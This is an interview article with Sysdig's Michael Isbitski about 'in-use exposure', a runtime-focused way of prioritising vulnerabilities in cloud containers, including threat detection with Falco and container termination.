In-use exposure – a probability-based approach to cloud container flaws?

Don't get distracted by the size of the potential problem - focus on what's most likely.
28 February 2023

In-use exposure – bringing clarity to confusion.

In Part 1 of this article, we spoke to Michael Isbitski, Director of Cybersecurity Strategy at Sysdig, about a rising tide of flaws in cloud containers, and the subsequent security risk with which an increasingly cloud-native market was having to contend. Sysdig’s Kubernetes report for 2023 suggested that there were flaws in 87% of software containers and that 90% of such containers were not yet using zero trust techniques. After explaining some of the reasons for this rise in vulnerabilities – including a significant increase in the number of containers that existed for very short periods of time, and business pressures forcing companies to accept a degree of risk in their software containers, Michael told us of the latest idea to find and deal with potential threats in this rapidly-moving environment – in-use exposure.

We asked him to explain what that was and how it worked.

THQ:

So how does in-use exposure help, given the size and potential difficulty of this issue?

MI:

OK – as we mentioned in Part 1, businesses are finding themselves caught between a rock and a hard place with container images. They want to, and probably should, scan everything, because attackers are getting extremely adept at putting malicious code into containers. But there’s just such a volume of code to check, it would be counter-productive for businesses to spend the time scanning absolutely everything to minimize their risk. They’ve come to accept some degree of risk in using their assets, potentially picked up from public registries.

Minimize risk to eradicate flaws.

So the question becomes one of how you minimize that risk, and maximize the likelihood of finding and eradicating flaws and vulnerabilities.

How do you do that? Visibility is a largely missing piece of the puzzle. But again, if you try and get visibility over everything, with operations that are potentially huge and fast-moving, you actually aren’t getting the most effective solution – by the time you can see everything, something else is happening.

That’s where in-use exposure comes in. In-use exposure, as the name suggests, shows you what’s actually in use at any given time. The logic of which of course is that if things aren’t in use, they’re unlikely to be in danger at that moment. We’re looking at containers as they’re running, so we know how things are manifesting in your environment. And then we can tell you where the potential dangers are, in actual runtime.

So you start with maybe 100 packages, and you’re really only using two. So you can zone in on those to address the problem. It’s a combination of the need to analyze and the need for speed – focus on what’s running and you immediately cut down the chances of missing dangers by trying to look into everything.

A matter of focus.

THQ:

So it’s a rapid-focus tool, so you can see the dangers in time to do something about them. Which, when 87% of containers have flaws, has to be useful. But seeing is one thing, and dealing is another. What should companies do when their in-use exposure picture points to a container and yells “This thing is hostile!”?

MI:

Mitigation depends on two things. Firstly, focusing on things that are truly exploitable and in use, and secondly, having a threat detection engine, like Falco, which is open source, but is also the foundation of a commercial offering. You need that engine to detect if something goes awry. So say you have a logging library that was known to be vulnerable. That could be in your app code, it could be in the infrastructure. And then you’d want to watch for an attacker trying to inject some malicious data through the logging mechanism, and taking advantage of that vulnerability. So we would see that event and then be able to alert on it. Then we could block communication and terminate the container.

Obviously, quite how they mitigate is up to each individual organization, and they’ll take different approaches because they’ll have individual production impacts to actions like container termination, but that’s the state of play in the world of runtime security.

Runtime intelligence.

The thing we’re focusing on is delivering that runtime intelligence, because companies all over the place are saying they see vulnerabilities that they can’t address – all the third party open libraries and open source apps and so on make it practically impossible to address and fix all the vulnerabilities out there. But with runtime intelligence, you can tell which libraries you’re using in your runtime and cut down your vulnerability count from hundreds or even thousands to a much smaller, more manageable handful.

THQ:

Focusing down from the massively unmanageable to the credibly manageable?

Risky business.

MI:

Exactly. It’s not about solving the world, it’s about focusing the world down into what might actually be problematic, so companies can legitimately handle the vulnerabilities they actually have at any given point.

Ultimately, the CISO of the company has to make decisions on risk, and the nature of the modern business world is that there are always going to be bugs and vulnerabilities. So what do they do? With runtime intelligence, it helps shrink that impossibly huge problem down to something on which they can take credible business decisions.

THQ:

The world’s never going to be perfect, but we have to live in it anyway, so here’s a tool that makes it manageable? Here’s something that reduces the risk to something that can be managed?

MI:

Exactly – the whole thing is about risk management. Yeah, risk management. Risk is inherent, there’s always going to be risk. But it’s about being able to do as much as is possible to reduce that risk to a point where your business decisions are credible and data-driven. And that’s where in-use exposure can make a big difference.